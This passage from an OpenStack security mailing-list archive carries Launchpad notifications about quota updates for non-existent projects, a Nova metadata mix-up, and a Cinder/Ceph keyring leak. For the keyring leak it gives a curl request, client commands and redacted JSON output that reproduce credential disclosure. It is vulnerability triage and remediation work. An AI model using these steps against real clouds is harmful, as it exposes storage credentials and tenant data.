'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From fungi at yuggoth.org Tue Oct 29 15:27:17 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Tue, 29 Oct 2019 15:27:17 -0000 Subject: [Openstack-security] [Bug 1850273] Re: Updating any cinder quota for non-existent project works References: <157234114152.28002.7475267273272586998.malonedeb@chaenomeles.canonical.com> Message-ID: <157236283783.29624.15254229749965649278.malone@soybean.canonical.com> Thanks for the input everyone, from the OpenStack VMT's perspective we'll treat this as a class D report (security hardening opportunity) and not need an advisory. I've ended the embargo and switched the bug to public. https://security.openstack.org/vmt-process.html#incident-report-taxonomy ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. 
- When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850273 Title: Updating any cinder quota for non-existent project works Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1850273/+subscriptions From sean.mcginnis at gmail.com Tue Oct 29 15:51:07 2019 From: sean.mcginnis at gmail.com (Sean McGinnis) Date: Tue, 29 Oct 2019 15:51:07 -0000 Subject: [Openstack-security] [Bug 1850273] Re: Updating any cinder quota for non-existent project works References: <157234114152.28002.7475267273272586998.malonedeb@chaenomeles.canonical.com> Message-ID: <157236427004.28557.7514873272403874851.launchpad@chaenomeles.canonical.com> *** This bug is a duplicate of bug 1307491 *** https://bugs.launchpad.net/bugs/1307491 ** This bug has been marked a duplicate of bug 1307491 quota-update should error out if input provided is non-existent tenant id -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850273 Title: Updating any cinder quota for non-existent project works Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a cinder quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of cinder is made.  PUT /volume/v3//os-quota-sets/ Looks like project validation check is missing in the cinder quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. 
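
The missing check described above would amount to verifying the project against Keystone before touching the quota table. The sketch below is illustrative only, not the actual Cinder (or, for the related neutron report in bug 1850274, Neutron) fix; it assumes an admin keystoneauth session is available, and the exact exception paths can differ between releases:

from keystoneauth1 import exceptions as ks_exc
from keystoneclient.v3 import client as ks_client

def project_exists(session, project_id):
    """Return True if Keystone knows the project, False otherwise."""
    keystone = ks_client.Client(session=session)
    try:
        keystone.projects.get(project_id)
        return True
    except ks_exc.http.NotFound:
        return False

def update_quota(session, db_api, project_id, new_limits):
    # db_api is a placeholder for the service's quota persistence layer.
    # Reject updates for projects Keystone has never heard of, instead of
    # silently inserting a row keyed on an arbitrary string.
    if not project_exists(session, project_id):
        raise ValueError('project %s does not exist' % project_id)
    db_api.quota_update(project_id, new_limits)
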
To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1850273/+subscriptions From fungi at yuggoth.org Wed Oct 30 13:25:00 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 30 Oct 2019 13:25:00 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157244190084.18830.5391512076758958351.malone@wampee.canonical.com> Since there were no objections to the revised plan, I've switched the report to public, set the advisory task to won't fix and added a confirmed task for a security note. Thanks! ** Also affects: ossn Importance: Undecided Status: New ** Changed in: ossa Status: Incomplete => Won't Fix ** Changed in: ossn Status: New => Confirmed ** Changed in: ossn Assignee: (unassigned) => Brian Rosmaita (brian-rosmaita) ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. 
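
The JSON reproduced below shows exactly which fields come back to the caller. As a rough illustration of the mitigation direction (what the suggested revert of the rbd_keyring_conf change amounts to), the driver simply stops copying keyring material into the connection data; this is a sketch with placeholder names, not the actual Cinder RBD driver:

def build_rbd_connection_data(volume, conf):
    # 'conf' and its attributes are placeholders for the real driver config.
    data = {
        'name': 'volumes/%s' % volume.name,
        'hosts': conf.monitor_hosts,
        'ports': conf.monitor_ports,
        'cluster_name': conf.cluster_name,
        'auth_enabled': True,
        'auth_username': conf.rbd_user,
        'secret_type': 'ceph',
        'secret_uuid': conf.rbd_secret_uuid,
        'volume_id': volume.id,
    }
    # Deliberately not included: the raw keyring. Returning it from
    # os-initialize_connection hands cluster-wide credentials to any
    # authenticated user who can reach the volume actions API.
    return data
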
{    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. 
Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From rosmaita.fossdev at gmail.com Wed Oct 30 14:56:57 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Wed, 30 Oct 2019 14:56:57 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157244741788.28040.5608641862510499734.malone@chaenomeles.canonical.com> Using the Cinder part of the bug to track deprecating the option for removal in V; deprecation notice should reference the OSSN. ** Changed in: cinder Importance: Undecided => Low ** Changed in: cinder Status: New => In Progress ** Changed in: cinder Milestone: None => ussuri-1 ** Changed in: cinder Assignee: Eric Harney (eharney) => Brian Rosmaita (brian-rosmaita) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. 
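
Brian Rosmaita's note earlier in this message tracks deprecating the rbd_keyring_conf option for removal in the V cycle (the leaked connection info example follows below). A typical shape for such a deprecation with oslo.config is sketched here; the help text, reason, and registration group are illustrative and not the actual Cinder patch:

from oslo_config import cfg

RBD_OPTS = [
    cfg.StrOpt('rbd_keyring_conf',
               default='',
               help='Path to a Ceph keyring file (deprecated).',
               deprecated_for_removal=True,
               deprecated_since='Ussuri',
               deprecated_reason='Exposing the keyring through volume '
                                 'connection info can leak cluster-wide '
                                 'credentials; see bug 1849624 and the '
                                 'related OSSN.'),
]

CONF = cfg.CONF
# In the real driver these options are registered per backend section;
# the group name here is only for illustration.
CONF.register_opts(RBD_OPTS, group='ceph_backend')
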
{    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From 1841933 at bugs.launchpad.net Thu Oct 31 09:33:28 2019 From: 1841933 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 31 Oct 2019 09:33:28 -0000 Subject: [Openstack-security] [Bug 1841933] Re: Fetching metadata via LB may result with wrong instance data References: <156708456800.5802.11171099222674714929.malonedeb@gac.canonical.com> Message-ID: <157251441052.2581.5345193395515345805.launchpad@gac.canonical.com> ** Changed in: nova Assignee: Kobi Samoray (ksamoray) => Adit Sarfaty (asarfaty) -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
https://bugs.launchpad.net/bugs/1841933 Title: Fetching metadata via LB may result with wrong instance data Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: While querying metadata from an instance via a loadbalancer, metadata service relies on X-Metadata-Provider to identify the correct instance by querying Neutron for subnets which are attached to the loadbalancer. Then the subnet result is used to identify the instance by querying for ports which are attached to the subnets above. Yet, when the first query result is empty due to deletion, bug or any other reason within the Neutron side, this may cause a security vulnerability, as Neutron will retrieve ports of _any_ instance which has the same IP address as the instance which is queried. That could compromise key pairs and other sensitive data. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/1841933/+subscriptions From fungi at yuggoth.org Thu Oct 31 12:44:13 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Thu, 31 Oct 2019 12:44:13 -0000 Subject: [Openstack-security] [Bug 1850274] Re: Updating any neutron quota for non-existent project works References: <157234128665.19064.3192264662500421555.malonedeb@wampee.canonical.com> Message-ID: <157252585337.28040.16698714676839296799.malone@chaenomeles.canonical.com> Thanks for the feedback everyone, I've switched this to a regular public bug and set the security advisory task to won't fix, treating it as a class D report (hardening opportunity) per the OpenStack VMT's report taxonomy: https://security.openstack.org/vmt-process.html#incident- report-taxonomy ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - When we try to update a neutron quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Private Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850274 Title: Updating any neutron quota for non-existent project works Status in neutron: New Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a neutron quota for a non-existent project, we get a 200ok response. 
The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1850274/+subscriptions From 1850274 at bugs.launchpad.net Thu Oct 31 12:59:18 2019 From: 1850274 at bugs.launchpad.net (Slawek Kaplonski) Date: Thu, 31 Oct 2019 12:59:18 -0000 Subject: [Openstack-security] [Bug 1850274] Re: Updating any neutron quota for non-existent project works References: <157234128665.19064.3192264662500421555.malonedeb@wampee.canonical.com> Message-ID: <157252675990.2947.3533003254343099924.launchpad@gac.canonical.com> ** Changed in: neutron Status: New => Confirmed ** Changed in: neutron Importance: Undecided => Low -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1850274 Title: Updating any neutron quota for non-existent project works Status in neutron: Confirmed Status in OpenStack Security Advisory: Won't Fix Bug description: When we try to update a neutron quota for a non-existent project, we get a 200ok response. The non-existent project doesn't get created, but am entry for this project in the quotas table of neutron is made.  PUT network/v2.0/quotas/ Looks like project validation check is missing in the neutron quota update flow. Due to this flaw, multiple PUT calls on fake project ids might result in filling of quota tables very fast & can be considered a type of DOS attack. To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1850274/+subscriptions From rosmaita.fossdev at gmail.com Thu Oct 31 13:35:11 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 31 Oct 2019 13:35:11 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157252891131.18907.3061396779964503237.malone@wampee.canonical.com> OSSN patch is https://review.opendev.org/#/c/692256/ -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. 
As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. Remove rbd_keyring_conf param from any cinder config file, this will mitigate the information disclosure. 2. For cinder backups to still work, providers should instead deploy their ceph keyring secrets directly on cinder-backup hosts (/etc/cinder/.keyring.conf, to be confirmed). Note that nova-compute hosts should not be impacted by the change, because ceph secrets are expected to be stored in libvirt secrets already, thus making this keyring disclose useless to it. (to be confirmed, there may be other compute drivers that might be impacted by this) Quick code fix: Mandatory: revert this commit https://review.opendev.org/#/c/456672/ Optional: revert this one https://review.opendev.org/#/c/465044/, harmless in itself, but pointless once the first one has been reverted Long term code fix proposals: What the os.initialize_connection api call is meant to: allow simple users to use cinder as block storage as a service in order to attach volumes outside the scope of any virtual machines/nova. Thus, information returned by this call should give enough information for a volume attach to be possible for the caller but they should not disclose anything that would allow him to do more than that. Since it is not possible at all with ceph to do so (no tenant isolation within ceph cluster), the related cinder backend for ceph should not implement this route at all There is indeed no reason why cinder should disclose anything here about ceph cluster, including hosts, cluster-ids, if the attach is doomed to fail for users missing secret informations anyway. Then, any 'admin' service using this call to locally attach the volumes (nova-compute, cinder-backup...) 
should be modified to: - check caller rw permissions on requested volumes - escalate the request - go through a new admin api route, not this 'user' one To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1849624/+subscriptions From rosmaita.fossdev at gmail.com Thu Oct 31 13:39:13 2019 From: rosmaita.fossdev at gmail.com (Brian Rosmaita) Date: Thu, 31 Oct 2019 13:39:13 -0000 Subject: [Openstack-security] [Bug 1849624] Re: ceph backend, secret key leak References: <157190672936.29164.18418741485624946377.malonedeb@soybean.canonical.com> Message-ID: <157252915333.19263.11200748553583917338.malone@wampee.canonical.com> A note about step 2 in the Quick Workaround in the bug description: Gorka Eguileor noticed that the correct file location is actually: /etc/ceph/.client..keyring See https://opendev.org/openstack/os- brick/src/commit/87171abef8bf2336f15ce3a7949f77d7999e11b7/os_brick/initiator/connectors/rbd.py#L76 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1849624 Title: ceph backend, secret key leak Status in Cinder: In Progress Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Confirmed Bug description: Cinder + ceph backend, secret key leak Conditions: cinder + ceph backend + rbd_keyring_conf set in cinder config files As an authenticated simple user create a cinder volume that ends up on a ceph backend, Then reuse the os.initialize_connection api call (used by nova-compute/cinder-backup to attach volumes locally to the host running the services): curl -g -i -X POST https:///v3/c495530af57611e9bc14bbaa251e1e96/volumes/7e59b91e-d426-4294-bfc5-dfdebcb21879/action \     -H "Accept: application/json" \     -H "Content-Type: application/json" \     -H "OpenStack-API-Version: volume 3.15" \     -H "X-Auth-Token: $TOKEN" \     -d '{"os-initialize_connection": {"connector":{}}}' If you do not want to forge the http request, openstack clients and extensions may prove helpful. As root: apt-get install python3-oslo.privsep virtualenv python3-dev python3-os-brick gcc ceph-common virtualenv -p python3 venv_openstack source venv_openstack/bin/activate pip install python-openstackclient pip install python-cinderclient pip install os-brick pip install python-brick-cinderclient-ext cinder create vol 1 cinder --debug local-attach 7e59b91e-d426-4294-bfc5-dfdebcb21879 This leaks the ceph credentials for the whole ceph cluster, leaving anyone able to go through ceph acls to get access to all the volumes within the cluster. {    "connection_info" : {       "data" : {          "access_mode" : "rw",          "secret_uuid" : "SECRET_UUID",          "cluster_name" : "ceph",          "encrypted" : false,          "auth_enabled" : true,          "discard" : true,          "qos_specs" : {             "write_iops_sec" : "3050",             "read_iops_sec" : "3050"          },          "keyring" : "SECRETFILETOHIDE",          "ports" : [             "6789",             "6789",             "6789"          ],          "name" : "volumes/volume-7e59b91e-d426-4294-bfc5-dfdebcb21879",          "secret_type" : "ceph",          "hosts" : [             "ceph_host1",             "ceph_host2",             ...          ],          "volume_id" : "7e59b91e-d426-4294-bfc5-dfdebcb21879",          "auth_username" : "cinder"       },       "driver_volume_type" : "rbd"    } } Quick workaround: 1. 
